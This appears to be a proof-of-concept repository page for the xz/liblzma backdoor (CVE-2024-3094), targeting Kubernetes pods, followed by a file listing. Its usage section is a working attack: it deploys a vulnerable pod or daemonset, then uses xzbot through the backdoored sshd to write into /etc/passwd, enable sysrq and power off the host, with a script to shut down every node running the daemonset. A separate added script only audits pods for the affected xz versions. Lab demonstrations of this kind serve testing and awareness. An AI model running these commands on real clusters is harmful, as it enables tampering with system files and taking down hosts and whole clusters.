POC details: d0f023a4fa814598fdc848861136f5b7b63ce62a

Source
Related vulnerability
Title: xz security vulnerability (CVE-2024-3094)
Description: xz is an application used to read and write xz compressed streams. XZ Utils versions 5.6.0 and 5.6.1 contain a security vulnerability that stems from allowing an attacker to embed malicious code.
Description
Basic POC to test CVE-2024-3094
Introduction
# CVE-2024-3094
Basic POC to test CVE-2024-3094 vulnerability inside K8s cluster

## :exclamation: DISCLAIMER :exclamation: 
## USE ONLY FOR EDUCATIONAL PURPOSES THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE CAUSED BY THE USE OF THIS SOFTWARE

## Description

We deploy a vulnerable pod and exploit it to execute commands inside that pod. We do this within the same network for safety: the vulnerable pod is not exposed to the internet, but the concept is the same.

This vulnerability allows executing commands inside the pod even when the pod runs with a security context; for example, you can shut down the host that is running the pod.

If the vulnerability is present in a single pod, you can shut down that host, making all the services running on it temporarily unavailable. But if the vulnerable workload runs as a daemonset, you can shut down every host that runs that daemonset, even the whole cluster.
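The impact described above is only present when a workload actually ships one of the two backdoored releases, so a defender's first step is an inventory. The script below is an added example, not part of this repo or of the tools it references: it parses the output of `xz --version` (whose real format is `xz (XZ Utils) <version>` on the first line), flags 5.6.0 and 5.6.1, and, when called with `--audit <namespace>`, runs that check in every pod of a namespace via `kubectl exec`. The namespace name and the `--audit` flag are this example's own conventions; the sample outputs are constructed for an offline run.

```shell
#!/bin/sh
# Added example (not the repo's own code): flag the backdoored XZ Utils
# releases 5.6.0 and 5.6.1 from `xz --version` output, locally or per pod.

# Extract the XZ Utils version number from captured `xz --version` output.
# Expected first line (real xz format): "xz (XZ Utils) 5.6.1"
xz_version_from_output() {
  printf '%s\n' "$1" | sed -n 's/^xz (XZ Utils) \([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# Return 0 (true) when the version is one of the known-backdoored releases.
is_backdoored_xz_version() {
  case "$1" in
    5.6.0|5.6.1) return 0 ;;
    *) return 1 ;;
  esac
}

# Classify one captured `xz --version` output as BACKDOORED, ok, or no-xz
# (no-xz = the output did not come from xz at all, e.g. the binary is absent).
classify_xz_output() {
  ver=$(xz_version_from_output "$1")
  [ -n "$ver" ] || { echo "no-xz"; return; }
  if is_backdoored_xz_version "$ver"; then echo "BACKDOORED"; else echo "ok"; fi
}

# Audit every pod in a namespace (needs kubectl and cluster access).
# Prints one line per pod: <pod> <version-or-dash> <BACKDOORED|ok|no-xz>.
audit_namespace() {
  ns="$1"
  for pod in $(kubectl -n "$ns" get pods -o jsonpath='{.items[*].metadata.name}'); do
    out=$(kubectl -n "$ns" exec "$pod" -- xz --version 2>/dev/null) \
      || { echo "$pod - no-xz"; continue; }
    echo "$pod $(xz_version_from_output "$out") $(classify_xz_output "$out")"
  done
}

# Constructed sample outputs so the script demonstrates itself offline.
SAMPLE_VULN='xz (XZ Utils) 5.6.1
liblzma 5.6.1'
SAMPLE_OK='xz (XZ Utils) 5.4.6
liblzma 5.4.6'

if [ "${1:-}" = "--audit" ] && [ -n "${2:-}" ]; then
  audit_namespace "$2"
else
  echo "sample 5.6.1: $(classify_xz_output "$SAMPLE_VULN")"   # BACKDOORED
  echo "sample 5.4.6: $(classify_xz_output "$SAMPLE_OK")"     # ok
fi
```

Run it as `sh check_xz.sh --audit vulnes` against the namespace this POC uses. One caveat: the backdoor lives in liblzma, which sshd reaches through libsystemd, so an image can carry a vulnerable `liblzma.so.5.6.x` without having the `xz` binary at all; a `no-xz` result should be followed by a look at the shared library version in the image rather than treated as a clean result.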

## Requirements

- K8s cluster deployed
- Kubectl installed
- Access to the K8s cluster
- Go installed


## Usage

First, install xzbot

```bash
go install github.com/amlweems/xzbot@latest
```

Download the repo and deploy the vulnerable deployment/daemonset

```bash
git clone https://github.com/shefirot/CVE-2024-3094.git
cd CVE-2024-3094
# Deployment
kubectl apply -f deploy_cve-2024-3094.yml
# Or daemonset
kubectl apply -f daemonset_cve-2024-3094.yml
```

```bash
# Get the pod name
kubectl -n vulnes get pods

# Port forward the pod
kubectl -n vulnes port-forward <pod-name> 2225:22

# Execute command, for example write in /etc/passwd
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo "David estuvo aqui" >> /etc/passwd'

# Check the /etc/passwd file
kubectl -n vulnes exec <pod-name> -- /usr/bin/cat /etc/passwd
```

Next, shut down the host

```bash
# Enable sysrq
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo 1 > /proc/sys/kernel/sysrq'

# Shutdown the host
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo o > /proc/sysrq-trigger'
```

You can also shut down all the hosts that are running the daemonset

```bash
source shutdown_nodes.sh
```

### Known issues

#### 1. Connection refused

When you execute the loop to shutdown all the hosts, if you receive this error:

```bash
2024/06/11 12:08:58 dial tcp 127.0.0.1:2225: connect: connection refused
```

Give the port-forward more time to become ready; you can increase the sleep time in the loop.

### Extra info

The container image used was generated with the dockerfile in the repo; you can build the image yourself and push it to your registry.

To generate the patched liblzma.so.5.6.0 library, you can use the amlweems repo listed in the references.

### References

[amlweems repo](https://github.com/amlweems/xzbot)

[r0binak repo](https://github.com/r0binak/xzk8s)
File snapshot

[4.0K] /data/pocs/d0f023a4fa814598fdc848861136f5b7b63ce62a
├── [ 549] daemonset_cve-2024-3094.yml
├── [ 564] deploy_cve-2024-3094.yml
├── [ 684] dockerfile
├── [2.8K] README.md
└── [ 766] shutdown_nodes.sh

0 directories, 5 files